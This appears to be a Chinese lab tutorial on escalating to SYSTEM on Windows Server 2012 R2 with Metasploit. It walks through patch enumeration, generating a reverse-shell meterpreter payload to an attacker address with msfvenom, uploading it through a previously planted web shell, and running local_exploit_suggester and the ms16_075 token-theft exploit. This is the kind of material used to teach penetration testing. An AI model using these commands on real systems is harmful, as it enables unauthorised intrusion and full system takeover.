Bootstrap

利用MSF溢出漏洞提权windows server2012

实验内容

使用Kali Linux平台的“metasploit framework”工具,针对Windows2012R2操作系统,上传EXP实现系统提权。
在此之前已经上传一句话取得admin权限,在自己虚拟机做演示,大家通常取得的权限可能会比admin低,但也是可以进行以下提权的,这里要把目标提权至system权限。

实验环境

kalil inux

在这里插入图片描述

Windows Server 2012 R2
在这里插入图片描述

开始实验

下载https://github.com/chroblert/WindowsVulnScan
在这里插入图片描述
使用powershell运行KBCollect.ps,生成KB.json
在这里插入图片描述
在这里插入图片描述
修改KB.json编码格式
在这里插入图片描述
这里我把文档拿到了本机进行测试
执行脚本,可能会报错,pip install requests 下载即可
在这里插入图片描述
成功执行
在这里插入图片描述

查看具有公开EXP的CVE

python cve-check.py -C -f KB.json

在这里插入图片描述
生成反弹后门:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.121.139 LPORT=3333 -f exe -o msf.exe

在这里插入图片描述
使用蚁剑连接并上传后门程序
在这里插入图片描述
配置监听会话

msfconsole

在这里插入图片描述
开启监听

use exploit/multi/handler

在这里插入图片描述
启动后门
在这里插入图片描述
成功监听
在这里插入图片描述
查看当前权限getuid
在这里插入图片描述
切换出来为后续使用自动漏洞模块做准备

meterpreter > background

在这里插入图片描述
使用MSF post/multi/recon/local_exploit_suggester模块快速识别系统中可能被利用的漏洞

use post/multi/recon/local_exploit_suggester

在这里插入图片描述

show options 

在这里插入图片描述

set showdescription  true

设置会话为1
在这里插入图片描述
run
在这里插入图片描述
使用ms16_075令牌窃取提权

use exploit/windows/local/ms16_075_reflection_juicy

在这里插入图片描述
set session 1
在这里插入图片描述
run
在这里插入图片描述
getuid
在这里插入图片描述
提权成功

悦读

道可道,非常道;名可名,非常名。 无名,天地之始,有名,万物之母。 故常无欲,以观其妙,常有欲,以观其徼。 此两者,同出而异名,同谓之玄,玄之又玄,众妙之门。

;